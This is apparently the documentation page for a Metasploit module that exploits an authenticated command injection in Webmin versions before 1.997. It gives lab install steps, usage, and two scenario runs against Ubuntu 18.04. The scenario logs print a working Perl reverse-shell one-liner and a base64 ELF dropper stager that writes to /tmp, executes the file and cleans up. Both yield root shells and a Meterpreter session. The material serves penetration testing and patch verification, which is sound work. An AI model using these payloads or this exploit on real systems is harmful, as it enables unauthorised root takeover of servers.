Christophe De La Fuente
4.2 KiB
4.2 KiB
Vulnerable Application
This module exploits an arbitrary command injection in Webmin versions prior to 1.997.
Webmin uses the OS package manager (apt, yum, etc.) to perform package
updates and installation. Due to a lack of input sanitization, it is possible to
inject an arbitrary command that will be concatenated to the package manager call.
This exploit requires authentication and the account must have access to the Software Package Updates module.
Installation
Ubuntu
- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
- Install it along with its dependencies (
libio-pty-perlrequired when installing on Ubuntu 20.04)
apt-get install libauthen-pam-perl libio-pty-perl
dpkg -i ./webmin_1.996_all.deb
Setup
- Go to
https://<target IP>:10000/ - Login as
rootwith the OS password - Create a new user:
Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create - Setup permissions
Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save
Verification Steps
- Install and setup the application
- Start msfconsole
- Do:
use exploit/linux/http/webmin_package_updates_rce - Do:
run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password> - You should get a shell.
Options
TARGETURI
Set this to the Webmin base path. The default is /.
USERNAME
The account username to use.
PASSWORD
The account password.
Scenarios
Webmin 1.996 on Ubuntu 18.04
- Target 0 (
Unix In-Memory)
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200
id
uid=0(root) gid=0(root) groups=0(root)
cat /etc/issue
Ubuntu 18.04.6 LTS \n \l
- Target 1 (
Linux Dropper)
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Webmin 1.996 detected
[+] Webmin 1.996 is a supported target
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 192.168.0.23
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
[*] Command Stager progress - 100.00% done (823/823 bytes)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.0.23
OS : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux